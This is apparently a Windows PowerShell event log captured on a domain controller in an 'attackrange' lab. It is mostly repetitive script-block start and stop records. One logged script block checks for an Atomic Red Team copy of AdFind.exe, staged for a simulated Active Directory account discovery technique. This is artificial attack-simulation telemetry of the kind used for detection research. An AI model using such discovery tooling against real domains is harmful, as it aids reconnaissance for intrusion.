LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478846
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478845
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478844
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478843
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478842
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478841
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478840
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478839
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478838
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478837
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478836
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478835
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478834
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478833
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478832
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478831
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478830
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478829
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478828
Keywords=None
Message=Completed invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478827
Keywords=None
Message=Completed invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478826
Keywords=None
Message=Started invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478825
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478824
Keywords=None
Message=Started invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478823
Keywords=None
Message=Completed invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478822
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478821
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478820
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478819
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478818
Keywords=None
Message=Started invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478817
Keywords=None
Message=Started invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478816
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478815
Keywords=None
Message=Started invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478814
Keywords=None
Message=Completed invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478813
Keywords=None
Message=Completed invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478812
Keywords=None
Message=Started invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478811
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478810
Keywords=None
Message=Started invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478809
Keywords=None
Message=Completed invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478808
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478807
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478806
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478805
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478804
Keywords=None
Message=Started invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478803
Keywords=None
Message=Started invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478802
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478801
Keywords=None
Message=Started invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478800
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478799
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478798
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478797
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5e0d8bf0-0d59-46ae-ba48-466746596727
Runspace ID: b1992ef2-481f-4eb9-a780-53254f41a29e
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478796
Keywords=None
Message=Completed invocation of ScriptBlock ID: dea4b144-29f4-4286-bb01-4f52c88a2633
Runspace ID: b1992ef2-481f-4eb9-a780-53254f41a29e
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478795
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2b9cd2a2-9d25-45ed-a278-985660206b85
Runspace ID: b1992ef2-481f-4eb9-a780-53254f41a29e
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478794
Keywords=None
Message=Started invocation of ScriptBlock ID: 2b9cd2a2-9d25-45ed-a278-985660206b85
Runspace ID: b1992ef2-481f-4eb9-a780-53254f41a29e
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478793
Keywords=None
Message=Started invocation of ScriptBlock ID: dea4b144-29f4-4286-bb01-4f52c88a2633
Runspace ID: b1992ef2-481f-4eb9-a780-53254f41a29e
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478792
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if (Test-Path C:\AtomicRedTeam\atomics\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}}

ScriptBlock ID: dea4b144-29f4-4286-bb01-4f52c88a2633
Path:
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
